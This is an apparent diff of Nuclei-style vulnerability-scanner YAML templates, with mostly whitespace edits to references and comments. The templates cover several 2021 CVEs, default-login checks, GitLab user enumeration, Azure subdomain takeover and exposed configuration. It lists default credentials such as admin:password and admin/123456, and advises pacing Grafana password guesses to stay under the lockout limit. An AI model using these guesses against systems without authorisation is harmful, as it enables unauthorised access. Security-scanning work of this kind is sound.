tags: cve,cve2021,ssrf,rce,exchange tags: cve,cve2021,ssrf,rce,exchange
requests: requests:

View File

@ -6,8 +6,8 @@ info:
severity: critical severity: critical
description: Finding the Tieline Admin Panels with default credentials. description: Finding the Tieline Admin Panels with default credentials.
reference: reference:
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336 - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login tags: cve,cve2021,tieline,default-login
# admin:password # admin:password

View File

@ -7,7 +7,7 @@ info:
severity: critical severity: critical
tags: cve,cve2021,openam,rce,java tags: cve,cve2021,openam,rce,java
reference: reference:
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
requests: requests:
- method: GET - method: GET

View File

@ -13,7 +13,7 @@ requests:
headers: headers:
Content-Type: application/json Content-Type: application/json
body: | body: |
{"username":"admin","password":"123456"} {"username":"admin","password":"123456"}
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ requests:
gitlab_user: gitlab_user:
- 1234 - 1234
- admin - admin
# Enumerate valid user. # Enumerate valid user.
attack: clusterbomb attack: clusterbomb

View File

@ -9,8 +9,8 @@ info:
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755 - https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user. # So make sure, not to attempt more than 4 password for same valid user.
requests: requests:
@ -42,7 +42,7 @@ requests:
{"user":"admin","password":"§grafana_password§"} {"user":"admin","password":"§grafana_password§"}
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -8,9 +8,9 @@ info:
reference: reference:
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details. - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
# Update the list with more CNAMEs related to Azure # Update the list with more CNAMEs related to Azure
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
# Do not report this without claiming the CNAME. # Do not report this without claiming the CNAME.
dns: dns:
- name: "{{FQDN}}" - name: "{{FQDN}}"

View File

@ -6,10 +6,10 @@ info:
severity: info severity: info
tags: dns,takeover tags: dns,takeover
reference: reference:
- https://securitytrails.com/blog/subdomain-takeover-tips - https://securitytrails.com/blog/subdomain-takeover-tips
- https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
- https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
dns: dns:
- name: "{{FQDN}}" - name: "{{FQDN}}"

View File

@ -6,8 +6,8 @@ info:
severity: info severity: info
tags: exposure,api tags: exposure,api
reference: reference:
- https://github.com/dwisiswant0/wadl-dumper - https://github.com/dwisiswant0/wadl-dumper
- https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
requests: requests:
- method: GET - method: GET

View File

@ -6,8 +6,8 @@ info:
severity: info severity: info
tags: config,git,exposure tags: config,git,exposure
reference: reference:
- https://twitter.com/pratiky9967/status/1230001391701086208 - https://twitter.com/pratiky9967/status/1230001391701086208
- https://www.tenable.com/plugins/was/98595 - https://www.tenable.com/plugins/was/98595
requests: requests:
- method: GET - method: GET

View File

@ -5,8 +5,8 @@ info:
author: ELSFA7110 author: ELSFA7110
severity: low severity: low
reference: reference:
- https://hackerone.com/reports/761158 - https://hackerone.com/reports/761158
- https://hackerone.com/reports/300539 - https://hackerone.com/reports/300539
tags: config,exposure,sharepoint tags: config,exposure,sharepoint
requests: requests:

Some files were not shown because too many files have changed in this diff Show More